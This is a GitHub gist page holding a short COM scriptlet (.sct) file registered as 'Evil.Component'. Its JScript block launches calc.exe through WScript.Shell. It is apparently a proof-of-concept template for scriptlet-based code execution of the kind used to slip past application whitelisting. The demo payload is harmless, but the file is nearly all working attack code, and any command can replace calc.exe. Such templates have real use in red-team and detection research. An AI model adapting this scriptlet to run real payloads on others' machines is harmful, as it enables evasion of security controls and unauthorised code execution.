Skip to content

Instantly share code, notes, and snippets.

@kafkaesqu3
Last active September 2, 2019 22:47
Show Gist options
  • Save kafkaesqu3/3b42570949947d0a1207f62a20a6ef55 to your computer and use it in GitHub Desktop.
Save kafkaesqu3/3b42570949947d0a1207f62a20a6ef55 to your computer and use it in GitHub Desktop.
<?XML version="1.0"?>
<scriptlet>
<registration
description="Evil.Component"
progid="Evil.Component"
version="1"
classid="{69486DD6-C19F-42e8-B508-A53F9F8E67B8}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment